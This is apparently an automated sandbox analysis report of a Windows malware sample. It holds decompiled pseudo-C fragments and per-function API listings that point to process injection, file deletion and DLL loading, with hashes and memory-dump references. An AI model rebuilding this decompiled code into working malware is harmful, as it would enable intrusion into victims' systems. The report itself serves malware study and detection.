                              							} else {
                              								_t70 =  *0x13ed2b4; // 0x69b25f44
                              								_t52 = E013E4F59(_t104, _t102, _t70 ^ 0xb9d404b2);
                              							}
                              							if(_t52 != 0 && E013E2C74(0, _t52) != 0) {
                              								_t121 =  *0x13ed35c; // 0x3ad95b0
                              								E013E3A19(_t121 + 4, _t68);
                              							}
                              							if(_t102 == 0) {
                              								_t53 = 0;
                              							} else {
                              								_t65 =  *0x13ed2b4; // 0x69b25f44
                              								_t53 = E013E4F59(_t104, _t102, _t65 ^ 0x3df17130);
                              							}
                              							if(_t53 == 0) {
                              								L59:
                              								_t54 =  *0x13ed2b8; // 0x26ea5a8
                              								_t22 = _t54 + 0x13ee252; // 0x616d692f
                              								 *0x13ed304 = _t22;
                              								goto L60;
                              							} else {
                              								_t64 = E013E2C74(0, _t53);
                              								 *0x13ed304 = _t64;
                              								if(_t64 != 0) {
                              									L60:
                              									if(_t102 == 0) {
                              										_t56 = 0;
                              									} else {
                              										_t61 =  *0x13ed2b4; // 0x69b25f44
                              										_t56 = E013E4F59(_t104, _t102, _t61 ^ 0xd2079859);
                              									}
                              									if(_t56 == 0) {
                              										_t57 =  *0x13ed2b8; // 0x26ea5a8
                              										_t23 = _t57 + 0x13ee79a; // 0x6976612e
                              										_t58 = _t23;
                              									} else {
                              										_t58 = E013E2C74(0, _t56);
                              									}
                              									 *0x13ed370 = _t58;
                              									HeapFree( *0x13ed270, 0, _t102);
                              									_v12 = 0;
                              									goto L67;
                              								}
                              								goto L59;
                              							}
                              						}
                              					}
                              				}
                              			}

                              APIs
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E29F2
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2A24
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2A56
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2A88
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2ABA
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2AEC
                              • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 013E2BEB
                              • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 013E2BFF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: 551adafb86a354be9e6c7829a220ebc14c1f5787b7fbad5a53f1e779e59ce28f
                              • Instruction ID: 1dbb3814d8b9ce291d892662db8a2bd038554806ada44071daacc31c4b2c1de0
                              • Opcode Fuzzy Hash: 551adafb86a354be9e6c7829a220ebc14c1f5787b7fbad5a53f1e779e59ce28f
                              • Instruction Fuzzy Hash: 73817570A1032AAEEB30DBBCDDCCD6B7BFDAB58708B244915E101DB1C8EA75D9458720
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?), ref: 0102D1BB
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0102D224
                              • lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 0102D24C
                              • RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0102D29E
                              • DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0102D2A9
                              • FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0102D2BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                              • String ID: }
                              • API String ID: 499515686-4239843852
                              • Opcode ID: 1f914b7892fa40f8826c9adccb0bc8bb7eacdc25522ae8b2c164ee5a66c879fa
                              • Instruction ID: 3949b162a54deb4aaa6c1cad20356abc1dede02ebc4326c600ac7296e0fb4cbc
                              • Opcode Fuzzy Hash: 1f914b7892fa40f8826c9adccb0bc8bb7eacdc25522ae8b2c164ee5a66c879fa
                              • Instruction Fuzzy Hash: 32419BB090021AEFDF21AFE8CD84AEEBFB8EF11354F1041A5E981A2154DB75CE48DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 010449CE
                              • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 01044A86
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 01044A1C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 01044A35
                              • GetLastError.KERNEL32(?,?,?,?), ref: 01044A54
                              • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 01044A66
                              • GetLastError.KERNEL32(?,?,?,?), ref: 01044A6E
                              Strings
                              • Software\Microsoft\WAB\DLLPath, xrefs: 010449BF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                              • String ID: Software\Microsoft\WAB\DLLPath
                              • API String ID: 1628847533-3156921957
                              • Opcode ID: 946ee08676ee02b74b6fd0c0c73f2fe9a5c38c4a7e19f97005c28f59e8cfd62e
                              • Instruction ID: 44c4a3c78bc1642a8eafe92d58d47e970411bd3c54319da876e4be6779915d21
                              • Opcode Fuzzy Hash: 946ee08676ee02b74b6fd0c0c73f2fe9a5c38c4a7e19f97005c28f59e8cfd62e
                              • Instruction Fuzzy Hash: B5216DB5900118FBDB31ABA89DC8EAEBFBCEB84250B1541B5F992E3115D6364E10CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0102DE50: ExpandEnvironmentStringsW.KERNEL32(761506E0,00000000,00000000,761506E0,00000020,80000001,01022289,?,761506E0), ref: 0102DE61
                                • Part of subcall function 0102DE50: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0102DE7E
                              • FreeLibrary.KERNEL32(?), ref: 01025B1C
                                • Part of subcall function 01033FE6: lstrlenW.KERNEL32(?,00000000,?,?,?,01025A61,?,?), ref: 01033FF3
                                • Part of subcall function 01033FE6: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,01025A61,?,?), ref: 0103401C
                                • Part of subcall function 01033FE6: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0103403C
                                • Part of subcall function 01033FE6: lstrcpyW.KERNEL32(-00000002,?), ref: 01034057
                                • Part of subcall function 01033FE6: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,01025A61,?,?), ref: 01034063
                                • Part of subcall function 01033FE6: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,01025A61,?,?), ref: 01034066
                                • Part of subcall function 01033FE6: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,01025A61,?,?), ref: 01034072
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 0103408F
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 010340A9
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 010340BF
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 010340D5
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 010340EB
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 01034101
                              • FindFirstFileW.KERNEL32(?,?,?,?), ref: 01025A72
                              • lstrlenW.KERNEL32(?), ref: 01025A8E
                              • lstrlenW.KERNEL32(?), ref: 01025AA6
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpyW.KERNEL32(00000000,?), ref: 01025ABF
                              • lstrcpyW.KERNEL32(00000002), ref: 01025AD4
                                • Part of subcall function 01032DDE: lstrlenW.KERNEL32(?,00000000,747C8250,747869A0,?,?,?,01025AE4,?,00000000,?), ref: 01032DEE
                                • Part of subcall function 01032DDE: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,01025AE4,?,00000000,?), ref: 01032E10
                                • Part of subcall function 01032DDE: lstrcpyW.KERNEL32(00000000,?), ref: 01032E3C
                                • Part of subcall function 01032DDE: lstrcatW.KERNEL32(00000000,?), ref: 01032E4F
                              • FindNextFileW.KERNEL32(?,00000010), ref: 01025AFC
                              • FindClose.KERNEL32(00000002), ref: 01025B0A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                              • String ID:
                              • API String ID: 1209511739-0
                              • Opcode ID: 89fc398d2ca41fe14fdf174142b3a1e97ac8f888e7a2f5a50d54ecdb22d3de29
                              • Instruction ID: 5eb4b2e0812deb7569d8b0e4505cdfcb3823c5de1ad9c9405d3b6809daf8685d
                              • Opcode Fuzzy Hash: 89fc398d2ca41fe14fdf174142b3a1e97ac8f888e7a2f5a50d54ecdb22d3de29
                              • Instruction Fuzzy Hash: 2D4159715083169BD721EF28DD84AAFBBE8FB84744F04092AF6D4D2150DB36D909CFA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0102C0F1
                                • Part of subcall function 010309CA: NtAllocateVirtualMemory.NTDLL(0102C119,00000000,00000000,0102C119,00003000,00000040), ref: 010309FB
                                • Part of subcall function 010309CA: RtlNtStatusToDosError.NTDLL(00000000), ref: 01030A02
                                • Part of subcall function 010309CA: SetLastError.KERNEL32(00000000), ref: 01030A09
                              • GetLastError.KERNEL32(?,00000318,00000008), ref: 0102C201
                                • Part of subcall function 0102D049: RtlNtStatusToDosError.NTDLL(00000000), ref: 0102D061
                              • memcpy.NTDLL(00000218,01048D80,00000100,?,00010003,?,?,00000318,00000008), ref: 0102C180
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0102C1DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                              • String ID:
                              • API String ID: 2966525677-3916222277
                              • Opcode ID: d99032b00682247a6351e928c6ecbe7a9765e0224e3bfb7def754f89f4213f8a
                              • Instruction ID: 2769764971fcc36e7f11ea0c30a15872fac349a52b7d4c1e58247412b2d3a335
                              • Opcode Fuzzy Hash: d99032b00682247a6351e928c6ecbe7a9765e0224e3bfb7def754f89f4213f8a
                              • Instruction Fuzzy Hash: E831857190131AEFEB21DFA4DA85A9EB7F8FB15344F10456AE59AE3140D7309A44CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset$memcpy
                              • String ID:
                              • API String ID: 368790112-0
                              • Opcode ID: 5a0e4142b812b1006d80ff604bd9fa7373dd9bc1c953f38140ca897adef66fa0
                              • Instruction ID: dd6238bc19fa3bb008bd6b06bfe5cfec91c5491055e7a8f35968e614b2a940d0
                              • Opcode Fuzzy Hash: 5a0e4142b812b1006d80ff604bd9fa7373dd9bc1c953f38140ca897adef66fa0
                              • Instruction Fuzzy Hash: B5F10570500BA9CFCB32CF68C5946EABBF4FF51304F2449ADC9D796682D632AA45CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0103C10E
                              • lstrlenW.KERNEL32(?), ref: 0103C11C
                              • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0103C147
                              • lstrcpyW.KERNEL32(00000006,00000000), ref: 0103C174
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Query$lstrcpylstrlen
                              • String ID:
                              • API String ID: 3961825720-0
                              • Opcode ID: 007b3b9d221b3fa6388008f4e582bd6f39b83cb22f445fb3d03b1789eff2da16
                              • Instruction ID: a7daee046066aacfb2dc4359b696fcdd423b12ecad809c8bed0ca2aa0191b66b
                              • Opcode Fuzzy Hash: 007b3b9d221b3fa6388008f4e582bd6f39b83cb22f445fb3d03b1789eff2da16
                              • Instruction Fuzzy Hash: 07414DB550020AFFEB118FA8CA84AAEBBACFF45310F00406AFA91E6154D775DA11AB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,01050244,00000001), ref: 0102E545
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0102E590
                                • Part of subcall function 01023475: CreateThread.KERNELBASE(00000000,00000000,00000000,?,010501F8,010210B6), ref: 0102348C
                                • Part of subcall function 01023475: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 010234A1
                                • Part of subcall function 01023475: GetLastError.KERNEL32(00000000), ref: 010234AC
                                • Part of subcall function 01023475: TerminateThread.KERNEL32(00000000,00000000), ref: 010234B6
                                • Part of subcall function 01023475: CloseHandle.KERNEL32(00000000), ref: 010234BD
                                • Part of subcall function 01023475: SetLastError.KERNEL32(00000000), ref: 010234C6
                              • GetLastError.KERNEL32(Function_00012AB7,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 0102E578
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0102E588
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                              • String ID:
                              • API String ID: 1700061692-0
                              • Opcode ID: da7e04792a9994553b66237fd34b714b289ad332213ce8d017ebea463225d626
                              • Instruction ID: d1d5001b591c4e966bf2d8c59de54bafd2e4d1a78637d1a58fcabd552bfc9c0e
                              • Opcode Fuzzy Hash: da7e04792a9994553b66237fd34b714b289ad332213ce8d017ebea463225d626
                              • Instruction Fuzzy Hash: 90F081B5381221AFF3605A689C88A6F7B58EB89371B100534FA96C6294E6794C058AA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0103CFFC
                              • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0103D03C
                                • Part of subcall function 01044FEA: NtWriteVirtualMemory.NTDLL(?,00000004,?,?,?,74786780,?,0103FDBE,?,00000004,?,00000004,?), ref: 01045008
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0103D045
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                              • String ID:
                              • API String ID: 4036914670-0
                              • Opcode ID: e54985493e43219eb05bda364d8188d86fa2ddf75db84c97ce1fee641ef8af69
                              • Instruction ID: bdaedd4c420c1763e14950247c3c42f32ac551dffc7e63bc8a77344b4d14491f
                              • Opcode Fuzzy Hash: e54985493e43219eb05bda364d8188d86fa2ddf75db84c97ce1fee641ef8af69
                              • Instruction Fuzzy Hash: F001FB79A40108FFEB11ABE5DD45EEEBBBDEB88740F500025FA81E2154E77AD9059B20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 010296C1
                              • RtlNtStatusToDosError.NTDLL(C000009A), ref: 010296F8
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorFreeHeapInformationQueryStatusSystem
                              • String ID:
                              • API String ID: 2533303245-0
                              • Opcode ID: bd33a61cb377857044a67e75872286324ff4fab75825e546a63ae19b6ceea9c0
                              • Instruction ID: a5a2ac2cc5e76f654b80b0aa0424592c9d3d337c67ccecd5dc5f3873a2e5c9aa
                              • Opcode Fuzzy Hash: bd33a61cb377857044a67e75872286324ff4fab75825e546a63ae19b6ceea9c0
                              • Instruction Fuzzy Hash: 2501D676902135AFE7315A58C90CAEF7EEC9F4DB58F060164EEC1A3100D7768E00D6E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 01042CC4
                              • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 01042CDC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InformationProcessQuerymemset
                              • String ID:
                              • API String ID: 2040988606-0
                              • Opcode ID: d20d2a8e88e3206689911aa12222e4c6782cefaeb0178db0447842b9ef59fbc6
                              • Instruction ID: 53b50c13e9bc88c4e99c88f493f666799176aab7eb2e1eaeb256df575a209e2b
                              • Opcode Fuzzy Hash: d20d2a8e88e3206689911aa12222e4c6782cefaeb0178db0447842b9ef59fbc6
                              • Instruction Fuzzy Hash: 16F044B5A0022CBBDB10DA95DC45FDE7B6C9B14740F404060FA44E2191D370DA448BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01027E99
                              • SetLastError.KERNEL32(00000000,?,01033BF0,?,?,?,00000004,?,00000000,010501F4,?,00000000), ref: 01027EA0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$LastStatus
                              • String ID:
                              • API String ID: 4076355890-0
                              • Opcode ID: 99761d4775154a4adbea45878fa5a1dc9c0b4cebf4511c645ace6d26c2d3fa92
                              • Instruction ID: 83dc4563056cc18296c9b4c7ee3c10395ee44d82d52a3023b65e325ce3c77748
                              • Opcode Fuzzy Hash: 99761d4775154a4adbea45878fa5a1dc9c0b4cebf4511c645ace6d26c2d3fa92
                              • Instruction Fuzzy Hash: 0CE01A7720022AEBDF115FE8AE04D8A7B69EB1C781B004020FF41C2120C63AC820ABB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 010352EA
                              • memset.NTDLL ref: 010352F9
                                • Part of subcall function 0103EDCC: memset.NTDLL ref: 0103EDDD
                                • Part of subcall function 0103EDCC: memset.NTDLL ref: 0103EDE9
                                • Part of subcall function 0103EDCC: memset.NTDLL ref: 0103EE14
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: f0541a7332941da5967c5b617b5980c67a411601c8d66521be409c84e3452cf6
                              • Instruction ID: 34bbf0c9c1b45152be5719d435b39c043e24c77a72948e6cef3052095c8b732c
                              • Opcode Fuzzy Hash: f0541a7332941da5967c5b617b5980c67a411601c8d66521be409c84e3452cf6
                              • Instruction Fuzzy Hash: FF022370501B518FC776CF29CA80567BBF9BF91610B644E2ED6E786AA1E372F481CB04
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 8f88828fdede64b7dc8edc789b3ba7c8fa2c8197a3d153c564b909b39e2268ae
                              • Instruction ID: ecfa8e71baf306eb8c02db2eb056a415fccc42f6b5cf39a62a407dc984c08b27
                              • Opcode Fuzzy Hash: 8f88828fdede64b7dc8edc789b3ba7c8fa2c8197a3d153c564b909b39e2268ae
                              • Instruction Fuzzy Hash: 8122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E013E3373(void* __ecx, intOrPtr* _a4) {
                              				signed int _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				intOrPtr _v44;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				intOrPtr _v56;
                              				intOrPtr _v60;
                              				intOrPtr _v64;
                              				intOrPtr _v68;
                              				intOrPtr _v72;
                              				void _v76;
                              				intOrPtr* _t226;
                              				signed int _t229;
                              				signed int _t231;
                              				signed int _t233;
                              				signed int _t235;
                              				signed int _t237;
                              				signed int _t239;
                              				signed int _t241;
                              				signed int _t243;
                              				signed int _t245;
                              				signed int _t247;
                              				signed int _t249;
                              				signed int _t251;
                              				signed int _t253;
                              				signed int _t255;
                              				signed int _t257;
                              				signed int _t259;
                              				signed int _t274;
                              				signed int _t337;
                              				void* _t347;
                              				signed int _t348;
                              				signed int _t350;
                              				signed int _t352;
                              				signed int _t354;
                              				signed int _t356;
                              				signed int _t358;
                              				signed int _t360;
                              				signed int _t362;
                              				signed int _t364;
                              				signed int _t366;
                              				signed int _t375;
                              				signed int _t377;
                              				signed int _t379;
                              				signed int _t381;
                              				signed int _t383;
                              				intOrPtr* _t399;
                              				signed int _t407;
                              				signed int _t409;
                              				signed int _t411;
                              				signed int _t413;
                              				signed int _t415;
                              				signed int _t417;
                              				signed int _t419;
                              				signed int _t421;
                              				signed int _t423;
                              				signed int _t425;
                              				signed int _t427;
                              				signed int _t429;
                              				signed int _t437;
                              				signed int _t439;
                              				signed int _t441;
                              				signed int _t443;
                              				signed int _t445;
                              				void* _t447;
                              				signed int _t507;
                              				signed int _t598;
                              				signed int _t606;
                              				signed int _t612;
                              				signed int _t678;
                              				signed int* _t681;
                              				signed int _t682;
                              				signed int _t684;
                              				signed int _t689;
                              				signed int _t691;
                              				signed int _t696;
                              				signed int _t698;
                              				signed int _t717;
                              				signed int _t719;
                              				signed int _t721;
                              				signed int _t723;
                              				signed int _t725;
                              				signed int _t727;
                              				signed int _t733;
                              				signed int _t739;
                              				signed int _t741;
                              				signed int _t743;
                              				signed int _t745;
                              				signed int _t747;
                              
                              				_t226 = _a4;
                              				_t347 = __ecx + 2;
                              				_t681 =  &_v76;
                              				_t447 = 0x10;
                              				do {
                              					_t274 =  *(_t347 - 1) & 0x000000ff;
                              					_t347 = _t347 + 4;
                              					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                              					_t681 =  &(_t681[1]);
                              					_t447 = _t447 - 1;
                              				} while (_t447 != 0);
                              				_t6 = _t226 + 4; // 0x14eb3fc3
                              				_t682 =  *_t6;
                              				_t7 = _t226 + 8; // 0x8d08458b
                              				_t407 =  *_t7;
                              				_t8 = _t226 + 0xc; // 0x56c1184c
                              				_t348 =  *_t8;
                              				asm("rol eax, 0x7");
                              				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                              				asm("rol ecx, 0xc");
                              				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                              				asm("ror edx, 0xf");
                              				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                              				asm("ror esi, 0xa");
                              				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                              				_v8 = _t684;
                              				_t689 = _v8;
                              				asm("rol eax, 0x7");
                              				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                              				asm("rol ecx, 0xc");
                              				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                              				asm("ror edx, 0xf");
                              				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                              				asm("ror esi, 0xa");
                              				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                              				_v8 = _t691;
                              				_t696 = _v8;
                              				asm("rol eax, 0x7");
                              				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                              				asm("rol ecx, 0xc");
                              				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                              				asm("ror edx, 0xf");
                              				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                              				asm("ror esi, 0xa");
                              				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                              				_v8 = _t698;
                              				asm("rol eax, 0x7");
                              				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                              				asm("rol ecx, 0xc");
                              				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                              				_t507 =  !_t356;
                              				asm("ror edx, 0xf");
                              				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                              				_v12 = _t415;
                              				_v12 =  !_v12;
                              				asm("ror esi, 0xa");
                              				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                              				asm("rol eax, 0x5");
                              				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                              				asm("rol ecx, 0x9");
                              				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                              				asm("rol edx, 0xe");
                              				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                              				asm("ror esi, 0xc");
                              				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                              				asm("rol eax, 0x5");
                              				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                              				asm("rol ecx, 0x9");
                              				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                              				asm("rol edx, 0xe");
                              				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                              				asm("ror esi, 0xc");
                              				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                              				asm("rol eax, 0x5");
                              				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                              				asm("rol ecx, 0x9");
                              				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                              				asm("rol edx, 0xe");
                              				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                              				asm("ror esi, 0xc");
                              				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                              				asm("rol eax, 0x5");
                              				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                              				asm("rol ecx, 0x9");
                              				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                              				asm("rol edx, 0xe");
                              				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                              				asm("ror esi, 0xc");
                              				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                              				asm("rol eax, 0x4");
